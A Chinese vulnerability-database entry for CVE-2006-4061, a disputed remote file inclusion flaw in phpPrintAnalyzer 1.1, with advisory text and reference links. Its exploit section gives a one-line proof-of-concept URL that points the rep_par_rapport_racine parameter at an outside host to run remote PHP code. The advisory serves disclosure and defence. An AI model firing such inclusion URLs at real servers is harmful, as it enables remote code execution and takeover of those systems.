PHPPrintAnalyzer 'Index.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110748 漏洞类型 输入验证
发布时间 2006-08-07 更新时间 2006-11-10
CVE编号 CVE-2006-4061 CNNVD-ID CNNVD-200608-164
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28359
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-164
|漏洞详情
**有争议**ThomasPequetphpPrintAnalyzer1.1的index.php脚本存在PHP远程文件包含漏洞,当register_globals启用时,远程攻击者可借助rep_par_rapport_racine参数中的URL执行任意PHP代码。注意:第三方研究人员对此问题仍有争议,称rep_par_rapport_racine变量在使用前已初始化。
|漏洞EXP
source: http://www.securityfocus.com/bid/19397/info

phpPrintAnalyzer is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.

Version 1.1 is vulnerable to this issue; other versions may also be affected.

http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racine=http://www.example.com
|参考资料

来源:BID
名称:19397
链接:http://www.securityfocus.com/bid/19397
来源:BUGTRAQ
名称:20060807phpPrintAnalyzer<=1.1(rep_par_rapport_racine)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/442492/100/0/threaded
来源:OSVDB
名称:29133
链接:http://www.osvdb.org/29133
来源:SECTRACK
名称:1016652
链接:http://securitytracker.com/id?1016652
来源:BUGTRAQ
名称:20060814Re:phpPrintAnalyzer<=1.1(rep_par_rapport_racine)RemoteFileInclusionVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2006-08/0305.html